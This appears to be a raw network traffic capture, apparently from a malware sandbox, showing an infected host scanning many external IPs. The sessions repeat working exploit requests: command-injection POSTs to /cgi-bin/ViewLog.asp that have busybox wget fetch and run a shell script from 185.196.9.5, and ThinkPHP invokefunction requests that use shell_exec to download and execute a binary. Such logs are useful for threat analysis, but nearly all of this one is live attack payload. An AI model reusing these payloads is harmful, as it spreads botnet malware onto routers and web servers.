Feb 25, 2024 19:04:04.849713087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
651	192.168.2.15	52764	85.69.228.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.015321016 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
652	192.168.2.15	41106	31.136.86.188	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.025392056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.605695009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.725591898 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:09.189564943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:13.797616959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:22.757443905 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469186068 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:19.333121061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
653	192.168.2.15	57516	31.24.44.241	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.028662920 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.217513084 CET	432	IN	HTTP/1.1 302 Set-Cookie: JSESSIONID=B0C357FA1239F9644BE6B5E1191F3F08; Path=/; HttpOnly X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-Frame-Options: DENY Location: http://185.196.9.5/login?error Content-Length: 0 Date: Sun, 25 Feb 2024 18:04:05 GMT Keep-Alive: timeout=60 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
654	192.168.2.15	47348	94.110.30.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.032032967 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
655	192.168.2.15	59978	31.120.201.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.042743921 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.227941990 CET	258	IN	HTTP/1.1 404 Not Found Content-Type: text/html Vary: Origin Vary: Accept-Encoding X-Cache: SKIP ONLYGET Date: Sun, 25 Feb 2024 18:04:05 GMT Content-Length: 59 Connection: close Data Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 74 20 46 6f 75 6e 64 22 5d 7d 0a Data Ascii: {"code":404,"message":"Not Found","details":["Not Found"]}

Session ID	Source IP	Source Port	Destination IP	Destination Port
656	192.168.2.15	32942	94.121.135.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.063673973 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
657	192.168.2.15	54552	85.72.249.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.067514896 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
658	192.168.2.15	45194	94.122.236.140	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.067626953 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
659	192.168.2.15	57304	94.120.209.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.069169998 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
660	192.168.2.15	40614	94.123.4.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.069617033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
661	192.168.2.15	44304	95.131.78.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.072690964 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.302337885 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
662	192.168.2.15	44334	95.131.78.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.528378963 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
663	192.168.2.15	43126	95.217.58.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.706897020 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:05.903820992 CET	322	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
664	192.168.2.15	34576	95.168.243.180	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.712841988 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:05.916898966 CET	163	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
665	192.168.2.15	59544	95.216.180.207	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.743376017 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:05.976695061 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
666	192.168.2.15	35058	31.220.56.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.754528999 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.309587002 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
667	192.168.2.15	41660	31.136.134.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:05.818255901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:08.933549881 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.077591896 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:27.109467030 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:52.709129095 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:41.860565901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
668	192.168.2.15	37822	95.182.234.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.005043030 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.196409941 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 